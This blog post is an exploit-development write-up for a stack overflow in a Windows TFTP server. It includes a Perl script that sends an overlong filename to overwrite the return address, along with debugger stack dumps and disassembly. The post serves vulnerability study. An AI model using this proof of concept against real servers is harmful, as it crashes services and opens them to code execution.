You may say I am a dreamer,
But I am not the only one,
I hope someday you will join us,
And the world will live as one.
订阅数:121333
标签:安全技术 | 浏览数(336) | 评论数(3) | 03-08 23:34Debug in ftpdwin0.4.2
writer: demonalex[at]dark2s[dot]org
I remember had seem some information about overflow ftpdwin(verion
0.4.2),perhaps memory ability was decline,so I wonder
to find which idea can tell me how to overflow that baby...Let's
show my tools:IDA,,,OLLYDB,,,WINDB,,,AND SO ON...
1)First,open IDA to create *.MAP and export.Take OllyDb attach
tftpd.exe,import MAP File to OllyDb, F9 for running...
2)Now we must find length of useless buffer,how??? Write one fuzz
script of perl named fuzzer.pl,content:
*********************************************************
#!/bin/perl -w
use Net::TFTP;
$|=1;
if(!defined($target_ip=shift)){
die("usage: $0 target_ip\n");
}
##################################
#expcode:
$buffer="\x41"x500; #length of useless
buffer
$expcode="$buffer";
##################################
$tftp = Net::TFTP->new("$target_ip", BlockSize => 1024);
$tftp->octet;
$tftp->get("$expcode");
exit 1;
*********************************************************
500 Bytes?Mistaken...EIP is not "\x41"x4...How about 400 Bytes?Of
course is not 400,too.But let us see the content
of stack:
00F5F174 00000000
00F5F178 00406437 返回到 tftpd.00406437 来自
<jmp.&msvcrt.strcpy>
00F5F17C 00F5F19C
00F5F180 41414141
00F5F184 00000080
00F5F188 00240000
00F5F18C 00000001
Ctrl+G calls goto site to 00406437 and F2 give it a breakpoint in
OllyDB.
3)Open WINDB to Attach tftpd.exe,brute force about eip equal to
0x41414141,the length is 288(includes RET).
4)Change expcode in fuzzer.pl:
##################################
#expcode:
$buffer="\x41"x284; #length of useless
buffer
$ret="\x44\x43\x42\x41";
$expcode="$buffer"."$ret";
##################################
5)In result,Ctrl+F2 into OllyDB for run tftpd.exe again,then play
our new fuzzer.pl,stop it at our breakpoint(00406437)
,see:
00406437 |. 8D85 D8FDFFFF lea
eax,
[ebp-228]
; ||
0040643D |.
890424
mov [esp],
eax
; ||
00406440 |. E8 DB650100
call
<jmp.&msvcrt.strlen>
; |\strlen
00406445 |. 83F8 03
cmp eax,
3
; |
00406448 |. 76
16
jbe short
00406460
; |
0040644A |. C74424 04
5D6>mov dword ptr [esp+4],
0042655D ; |
00406452 |. 8D85 D8FDFFFF lea
eax,
[ebp-228]
; |
00406458 |.
890424
mov [esp],
eax
; |
0040645B |. E8 70650100
call
<jmp.&msvcrt.strcat>
; \strcat
00406460 |> 8D85 E8FEFFFF
lea eax,
[ebp-118]
; |
00406466 |. 894424 04
mov [esp+4],
eax
; |
0040646A |. 8D85 D8FDFFFF lea
eax,
[ebp-228]
; |
00406470 |.
890424
mov [esp],
eax
; |
00406473 |. E8 58650100
call
<jmp.&msvcrt.strcat>
; \strcat
00406478 |> 8B45
10 mov
eax,
[ebp+10]
; |
0040647B |. 05 04010000
add eax,
104
; |
00406480 |. 894424 0C
mov [esp+C],
eax
; |
00406484 |. 8B45 10
mov eax,
[ebp+10]
; |
00406487 |. 894424 08
mov [esp+8],
eax
; |
0040648B |. C74424 04
040>mov dword ptr [esp+4],
104 ;
|
00406493 |. 8D85 D8FDFFFF lea
eax,
[ebp-228]
; |
00406499 |.
890424
mov [esp],
eax
; |
0040649C |. E8 7F6C0100
call <jmp.&KERNEL32.GetFullPathNameA> ;
\GetFullPathNameA
004064A1 |. 83EC 10
sub esp, 10
004064A4 |.
85C0
test eax, eax
004064A6 |. 75
0C
jnz short 004064B4
004064A8 |. C785
D4FDFFFF>mov dword ptr [ebp-22C], 0
004064B2 |. EB
0A
jmp short 004064BE
004064B4 |> C785
D4FDFFFF>mov dword ptr [ebp-22C], 1
004064BE |> 8B85 D4FDFFFF
mov eax, [ebp-22C]
004064C4 |.
C9
leave
004064C5 \.
C3
retn
Press F8 from 00406437 to 004064C5,when come down at 004064C5,you
stop to find content of stack:
00F5F3C8 41424344
00F5F3CC 00428B00 tftpd.00428B00
hey hey ,u did it~
http://www.i170.com/Article/101822/trackbackPowered by Haiwit
pengyuwei 03-20 16:56 评论